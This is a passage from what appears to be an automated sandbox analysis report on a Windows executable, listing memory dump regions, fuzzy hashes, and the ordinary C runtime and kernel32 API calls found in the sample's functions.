                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5ef553a1d65d3978c18886c2bb15a01d89db4fcd428e3a5c7db4e2bed6a9a817
                                                                              • Instruction ID: 5389f43ec39ee75392403e23fbfd76fa2bd260010aa27ac0ec3f2541111381a8
                                                                              • Opcode Fuzzy Hash: 5ef553a1d65d3978c18886c2bb15a01d89db4fcd428e3a5c7db4e2bed6a9a817
                                                                              • Instruction Fuzzy Hash: 93D02BF5D4400087D208DB30EC41D7A7363DF53358F2C6538D49743323ED20A91AD641
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                              • Instruction ID: ca49160f7e46b79449c9280ece49736659986de0ccc4c5b10c815b50419e50e4
                                                                              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                              • Instruction Fuzzy Hash: 27D0A7B1A487A50E67588D3804A0477FBE8EA47622B18149EE4D6E3115D224DC019698
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b8200fc7d2d573583891e1bba31400938cb5e0ea9c47964188cd9055f63c0c87
                                                                              • Instruction ID: 788bca69d2feae45ad3b26dce8ed9885c92b95749784a17baf084996e2d533b3
                                                                              • Opcode Fuzzy Hash: b8200fc7d2d573583891e1bba31400938cb5e0ea9c47964188cd9055f63c0c87
                                                                              • Instruction Fuzzy Hash: BDC08C1084C18047D268CA20486A8B1FB365843004A19A09FC09217843D0004008430E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 80123446512879f5016dfd296faa7ddc302e65d89cdab3defe70f9e72f0d9f2f
                                                                              • Instruction ID: 4dd3b5d6ccc5f6cfd1cd7914c3b472b2b3d73b96009015bbf0fde9d28f4bc44d
                                                                              • Opcode Fuzzy Hash: 80123446512879f5016dfd296faa7ddc302e65d89cdab3defe70f9e72f0d9f2f
                                                                              • Instruction Fuzzy Hash: 73C09B25F5D1988FD100DF17D980532727A57E734971CF0118001AB35DD935D407AB08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8171c54953381c398625e03fa5402069a66d2de18c32af10bf04b85dab3633b1
                                                                              • Instruction ID: 7652dbf090065145e4cfd45cc32972e10dc175be9bd28020a4e9ba2fa8561ff0
                                                                              • Opcode Fuzzy Hash: 8171c54953381c398625e03fa5402069a66d2de18c32af10bf04b85dab3633b1
                                                                              • Instruction Fuzzy Hash: B1C09B34F5D1984FD604DF15D99143672B957D7345718F0149005E729DCD35D4079A0C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?,?,?), ref: 01000790
                                                                              • _malloc.LIBCMT ref: 010007C9
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,?,?,?,?,?), ref: 010007FC
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?,?), ref: 01000818
                                                                              • MultiByteToWideChar.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 01000852
                                                                              • _malloc.LIBCMT ref: 0100088B
                                                                              • __freea.LIBCMT ref: 010008EC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$_malloc$__freea
                                                                              • String ID:
                                                                              • API String ID: 1187765244-0
                                                                              • Opcode ID: 4df83bdc0ceb92d5017a9fad7fea160388bbd6d3729ee887c9d0cb6986f29658
                                                                              • Instruction ID: a3e653a5e2a6c7ea712b00dee0b136b6bb882ae557b017f42dc8e74bf2220a84
                                                                              • Opcode Fuzzy Hash: 4df83bdc0ceb92d5017a9fad7fea160388bbd6d3729ee887c9d0cb6986f29658
                                                                              • Instruction Fuzzy Hash: 0C819271900149AFFF229F68CC80AAE3BF5FF48394F14456AFA99A6194C335C950DF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • _strlen.LIBCMT ref: 01005B30
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,0100402F,00000000,00000000,?,0100402F,00000001,00000000,?,?,?,?,?,?), ref: 01005B70
                                                                              • _malloc.LIBCMT ref: 01005B80
                                                                              • _memset.LIBCMT ref: 01005BA8
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,0100402F,00000000,00000000,?,?,?,?,?,?,?,0100402F,00000001,00000000), ref: 01005BBF
                                                                              • __freea.LIBCMT ref: 01005C47
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$__freea_malloc_memset_strlen
                                                                              • String ID:
                                                                              • API String ID: 3923921168-0
                                                                              • Opcode ID: 549fa5842cf4261937909a813077705417ce494dcb331be3b54f4c6d6c137960
                                                                              • Instruction ID: 34dd9a425e06e312ef3203a484c1a70c1c3b262cd2b4e0106ba06229d7eb826a
                                                                              • Opcode Fuzzy Hash: 549fa5842cf4261937909a813077705417ce494dcb331be3b54f4c6d6c137960
                                                                              • Instruction Fuzzy Hash: 39417871D00609AFEF12DF99CC80DEEBBF9EF88350F240565EA54A6190D735A941CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • __CreateFrameInfo.LIBCMT ref: 0100274D
                                                                                • Part of subcall function 00FFDE53: __getptd.LIBCMT ref: 00FFDE61
                                                                                • Part of subcall function 00FFDE53: __getptd.LIBCMT ref: 00FFDE6F
                                                                              • __getptd.LIBCMT ref: 01002757
                                                                                • Part of subcall function 00FFED41: __amsg_exit.LIBCMT ref: 00FFED51
                                                                              • __getptd.LIBCMT ref: 01002765
                                                                              • __getptd.LIBCMT ref: 01002773
                                                                              • __getptd.LIBCMT ref: 0100277E
                                                                              • _CallCatchBlock2.LIBCMT ref: 010027A4
                                                                                • Part of subcall function 00FFDEF8: __CallSettingFrame@12.LIBCMT ref: 00FFDF44
                                                                                • Part of subcall function 0100284B: __getptd.LIBCMT ref: 0100285A
                                                                                • Part of subcall function 0100284B: __getptd.LIBCMT ref: 01002868
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit
                                                                              • String ID:
                                                                              • API String ID: 3688206559-0
                                                                              • Opcode ID: 6a8d33a4cc9a762797994944255010d5d80b52f4048648cc00af3fb95077cbff
                                                                              • Instruction ID: ec13dddf2492ed304c3ce7462302bd188cfff06a75a9f567d247c308dfec0578
                                                                              • Opcode Fuzzy Hash: 6a8d33a4cc9a762797994944255010d5d80b52f4048648cc00af3fb95077cbff
                                                                              • Instruction Fuzzy Hash: 4C11D7B5C00209DFDF01EFA4C885BAD7BB4FF18314F14806AF954AB261DB389A15AF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd$__amsg_exit
                                                                              • String ID: MOC$csm
                                                                              • API String ID: 1969926928-1389381023
                                                                              • Opcode ID: 33b9cced6b741998e27e7e2c03043b0455c789580758d048f674bb0431158d77
                                                                              • Instruction ID: e3ba02de229ba7c8e26f0f9323e99867b9701ad789916b6cb8e6d6ee7cae64fe
                                                                              • Opcode Fuzzy Hash: 33b9cced6b741998e27e7e2c03043b0455c789580758d048f674bb0431158d77
                                                                              • Instruction Fuzzy Hash: B4E04F321101088FE752AB68C489B3C37E8FF54314F5E04E2E64CCB672DB38D488A942
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 010079E1
                                                                              • __FindPESection.LIBCMT ref: 010079FB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                                              • String ID:
                                                                              • API String ID: 876702719-0
                                                                              • Opcode ID: 417b9a0fd97ab8630ea12ca5e279b3b508be10dfd9e73c123811561298f48b94
                                                                              • Instruction ID: ab3aaf8628b2240b0a5d29e93accd67ee4af5719ef399790f254fbe93017f070
                                                                              • Opcode Fuzzy Hash: 417b9a0fd97ab8630ea12ca5e279b3b508be10dfd9e73c123811561298f48b94
                                                                              • Instruction Fuzzy Hash: 3C91F332A102098BEB26CF68D840BAD77A6FB84310F15426DDAD5973D5D73EF941CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000000,?,00000000,00000000,?,0100402F,00000001,00000000,?), ref: 01003EEB
                                                                              • _memset.LIBCMT ref: 01003F40
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,00000000,00000001,?), ref: 01003F55
                                                                              • __freea.LIBCMT ref: 01003F6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$__freea_memset
                                                                              • String ID:
                                                                              • API String ID: 2568176243-0
                                                                              • Opcode ID: 6d739e8b207fa305f6ce35187df021b308f917f903bc0d2403cfe939a35e0095
                                                                              • Instruction ID: 4af32488a8dc57210231f44b030ad2f82a5bf22970dd06ecafaf55cb382e6cf6
                                                                              • Opcode Fuzzy Hash: 6d739e8b207fa305f6ce35187df021b308f917f903bc0d2403cfe939a35e0095
                                                                              • Instruction Fuzzy Hash: 09518AB250010AAFEF139FA8CC81DBF7BF9FB48354F144569FA949B190D631C9618BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___initmbctable.LIBCMT ref: 01001B6E
                                                                                • Part of subcall function 00FFE737: __setmbcp.LIBCMT ref: 00FFE742
                                                                              • _parse_cmdline.LIBCMT ref: 01001BB0
                                                                              • _parse_cmdline.LIBCMT ref: 01001BF1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: _parse_cmdline$___initmbctable__setmbcp
                                                                              • String ID: C:\Users\user\Desktop\file.exe
                                                                              • API String ID: 1290970244-1957095476
                                                                              • Opcode ID: aa923391835633a846cf614792a5cdd568a336f3e10661e26c4182718d295328
                                                                              • Instruction ID: 521b10c3fc3585d28d1ab4d8916b48e1c840d34983b82cb29d070f9284e3d5a7
                                                                              • Opcode Fuzzy Hash: aa923391835633a846cf614792a5cdd568a336f3e10661e26c4182718d295328
                                                                              • Instruction Fuzzy Hash: A821B772D00119EFDB12EBB89C80CDE7BB9EA85324F1406A5E691E72C0D734DA45CB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01005968
                                                                              • __isleadbyte_l.LIBCMT ref: 0100599C
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,?), ref: 010059CD
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,?), ref: 01005A3B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: 4f4a366e7a1a9b69a51a166f521f00a7618267edfeb9792870570a7c32946d36
                                                                              • Instruction ID: ec6bb14b70cb4b1520838223ff398c2887b5bd9eb3009dc8df94dca09af56911
                                                                              • Opcode Fuzzy Hash: 4f4a366e7a1a9b69a51a166f521f00a7618267edfeb9792870570a7c32946d36
                                                                              • Instruction Fuzzy Hash: FE319031A00246EFEB22DF68CC84ABD7BE5AF02320F1585A9E5D58B1D1E7319990DF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • TlsGetValue.KERNEL32(00FFC61F,?,00FFF598,?,00FFF568,00FFC61F,?,?,00FFC61F,?), ref: 00FFEB07
                                                                              • TlsGetValue.KERNEL32(00000005,?,00FFF598,?,00FFF568,00FFC61F,?,?,00FFC61F,?), ref: 00FFEB1E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID: DecodePointer$KERNEL32.DLL
                                                                              • API String ID: 3702945584-629428536
                                                                              • Opcode ID: d4ddbfaacb352efc85bd15364765e4f631755306fb0c9677f76f7deed06aee54
                                                                              • Instruction ID: 6df20889902151240a176f74feada96e94a8cf648115da00cda56cedfd9be8c0
                                                                              • Opcode Fuzzy Hash: d4ddbfaacb352efc85bd15364765e4f631755306fb0c9677f76f7deed06aee54
                                                                              • Instruction Fuzzy Hash: 54F0AF34D0121A6A9F226B66EC44DBA3A98DF842B4B084021FA4DE70B4DB25DC009A90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • TlsGetValue.KERNEL32(00000000,?,00FFF3BE,00FFC64C,?,?,?,00FFF42A,00FFC64C,0100BDC8,0000000C,00FFF456,00FFC64C,?,00FFC64C), ref: 00FFEA8C
                                                                              • TlsGetValue.KERNEL32(00000005,?,00FFF3BE,00FFC64C,?,?,?,00FFF42A,00FFC64C,0100BDC8,0000000C,00FFF456,00FFC64C,?,00FFC64C), ref: 00FFEAA3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID: EncodePointer$KERNEL32.DLL
                                                                              • API String ID: 3702945584-3682587211
                                                                              • Opcode ID: 417f8660b74022651e14545d53c831ec70b8325a9224ef87017707103440fb99
                                                                              • Instruction ID: ba5d7fa3ceb1ad5d80085acdbbd6fbbef89ac2bcf6dfce36a42549d080f472bf
                                                                              • Opcode Fuzzy Hash: 417f8660b74022651e14545d53c831ec70b8325a9224ef87017707103440fb99
                                                                              • Instruction Fuzzy Hash: 6CF04431D0151A6A9B21AB26DD049BB3A98EE443B4B045420FD58E61B1DB39DD01AB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

